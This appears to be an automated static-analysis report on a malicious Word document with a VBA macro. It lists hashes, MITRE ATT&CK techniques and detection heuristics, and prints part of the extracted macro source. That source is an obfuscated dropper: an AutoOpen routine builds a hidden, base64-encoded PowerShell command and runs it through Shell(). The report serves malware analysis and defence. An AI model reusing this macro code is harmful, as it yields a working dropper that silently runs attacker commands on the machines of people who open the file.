Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2ed4518c0e3a843b…

MALICIOUS

Office (OLE)

102.0 KB Created: 2018-05-30 16:23:00 Authoring application: Microsoft Office Word First seen: 2018-06-14
MD5: 47752662ac368eab5743779742725456 SHA-1: 9cd3cbc038fce23fd33fa47743fd65dd42b15aa9 SHA-256: 2ed4518c0e3a843b298646e842f599dc883ac6cd85a189ad856c5347696b194a
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The Autoopen macro is triggered upon opening, which then calls the LnHfVTJFP function. This function uses the Shell() command to execute a command string, likely to download and execute a second-stage payload. The ClamAV detection also confirms its malicious nature.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6565825-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6565825-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18601 bytes
SHA-256: bc116e7d42a2baa47e8868828169bf244a0c568966789eafd2c7d580c0405d8f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "HKcqvGlswc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function YbTCOY()
On Error Resume Next
HWMBI = Atn(86919 * CInt(4158) + 69176 - 72694)
FkLnFR = 83156 + _
Log(7138) - iBYPE / Atn(68906) / kMwhQ / ptifv
mzlWA = Atn(61999 * CInt(62137) + 53328 - 84434)
afCip = 74969 + _
Log(98635) - HIRFIp / Atn(71362) / QwuRJ / VURYzi
YbTCOY = zDCNjrr + snpESIqq + JBuanwGFZj + FAZtJsC + AIuAIBkPdJ + DWsiSGDswG + wAPqzVUOv + JhZuLLErNF + GLToSipOh
jXILY = Atn(72885 * CInt(37050) + 59442 - 66106)
CuvXn = 10939 + _
Log(63666) - vlwPjj / Atn(50180) / zJiQR / UKYkJu
End Function
Sub Autoopen()
On Error Resume Next
ERYhds = Atn(45236 * CInt(27887) + 5422 - 67027)
kjBtb = 37095 + _
Log(77690) - lVmJwR / Atn(4359) / ZkzCw / HrTXiG
LnHfVTJFP (YbTCOY)
CowaUj = Atn(70631 * CInt(77056) + 52889 - 66679)
whJOR = 15881 + _
Log(55374) - ajzdD / Atn(62867) / zZKZE / inihpi
End Sub
Function LnHfVTJFP(KIQLHl)
On Error Resume Next
kRYwCu = Atn(10880 * CInt(28252) + 57701 - 86414)
LuRfI = 8968 + _
Log(20362) - uCjLdB / Atn(58026) / Ouahc / AfJHz
TGoYwM = izWsG + Chr(vbKeyP) + NqppzcKoD
IbDTjk = Atn(27443 * CInt(19060) + 38058 - 5142)
dWvoaB = 11583 + _
Log(89696) - XarUDL / Atn(93657) / tlWAEi / TwQftn
SAfVcXC = JcLLHV + Shell(bmIjLlXEXXM + TGoYwM + bwUcUP + KIQLHl + WYSqXKzIjd, vbHide)
zLPwL = Atn(64103 * CInt(70887) + 51293 - 58452)
MDDij = 67851 + _
Log(30601) - ncQij / Atn(59192) / nKVbl / BIDafE
End Function



Attribute VB_Name = "APATHSnB"
Function zDCNjrr()
On Error Resume Next
djlaLb = Atn(10789 * CInt(37768) + 59365 - 36903)
ZiGHFs = 62185 + _
Log(87455) - ZRllhQ / Atn(90765) / tojSzt / iBlXt
MIJErPcJcB = "owersHeLL -Wi" + "nDowsTyle h" + "idden " + "-e KAAoACgAIg" + "B7ADYA" + "NwB9AHsANQ" + "AwAH0Aew" + "A5ADEAfQ" + "B7ADEAMgAzAH0" + "AewAy"
Nwqblz = Atn(12351 * CInt(81834) + 32181 - 85918)
TRVMu = 1586 + _
Log(86336) - jUaqmW / Atn(53432) / tZEGJA / LUuJv
KwIzwK = "ADcAfQB7AD" + "YANgB9AHsANQA5A" + "H0AewAxADEAOAB9" + "AHsANAA2AH0Ae" + "wAxADEANQB9AHs" + "ANQAzAH0Ae"
oucwa = Atn(97544 * CInt(62255) + 45014 - 1986)
AscMdn = 13283 + _
Log(7919) - JOMRM / Atn(72992) / TQKrzr / drawtM
YHTuldmvC = "wAxADQAfQB7AD" + "IAfQB7ADU" + "ANgB9AHsAOQA4" + "AH0Ae" + "wAxADEANA"
vNslD = Atn(26791 * CInt(63363) + 76817 - 45214)
NqElC = 54127 + _
Log(55506) - KdfPN / Atn(17900) / JvwUCp / rjOAT
zCPMVlcZfS = "B9AHsAMgA2A" + "H0AewAxAD" + "AANgB9AHsANgA" + "yAH0AewA4A" + "DYAfQB7ADIA" + "OQB9AHsANAAxAH"
IYQftl = Atn(58074 * CInt(18169) + 73834 - 22790)
Pzijjt = 60990 + _
Log(662) - zuSiTV / Atn(67646) / wYWCI / HmMzWb
DiirthZCij = "0AewAzAH0Ae" + "wAyAD" + "EAfQB7" + "ADEAOAB9AHs" + "AMgAwAH0Ae" + "wA0ADkAfQB" + "7ADMA"
iWjXFE = Atn(13642 * CInt(55881) + 16134 - 75559)
AkiNFh = 23811 + _
Log(46045) - dKNoY / Atn(14119) / azWtJ / ETXiL
dzWhzDWRKvt = "MQB9AH" + "sANwAyAH0AewAxA" + "DAANQ" + "B9AHsAMwA3AH"
QcXql = Atn(77228 * CInt(3697) + 45856 - 28627)
jfnwYB = 37920 + _
Log(17358) - wzDjfl / Atn(88222) / bjOqW / wHaGU
jMDFfdBi = "0AewA1AH0AewAx" + "ADMAfQB" + "7ADEAMg" + "A0AH0A" + "ewAxADEAMQB9" + "AHsANwA1A" + "H0AewAxADA" + "ANwB9AHsAMQA" + "yAH0Aew"
AWjljR = Atn(83474 * CInt(11856) + 20365 - 99916)
zOoMQ = 25441 + _
Log(91460) - ErOarA / Atn(6770) / Iorwv / jucORz
JkRqV = "A0ADAA" + "fQB7ADkAMAB9AH" + "sANwA3AH0AewA2" + "AH0AewAxA" + "DEAOQ" + "B9AHsAMgAyAH" + "0AewAxADAANAB9" + "AHsAOQA3AH" + "0AewAxA" + "DAAMwB"
unPbd = Atn(29375 * CInt(52612) + 65872 - 19555)
tiNPlm = 92755 + _
Log(84103) - dHiRTB / Atn(14051) / iukBv / iKDzwO
YIdCzTYT = "9AHsANAA" + "1AH0AewA" + "2ADEAfQB7AD" + "cAOAB9AHsAMQ" + "A3AH0AewAzADY" + "AfQB7AD"
zDCNjrr = MIJErPcJcB + KwIzwK + YHTuldmvC + zCPMVlcZfS + DiirthZCij + dzWhzDWRKvt + jMDFfdBi + JkRqV + YIdCzTYT
End Function
Function snpESIqq()
On Error Resume Next
cbwGzT = Atn(64872 * CInt(68895) + 91162 - 15020)
WfWHLW = 92192
... (truncated)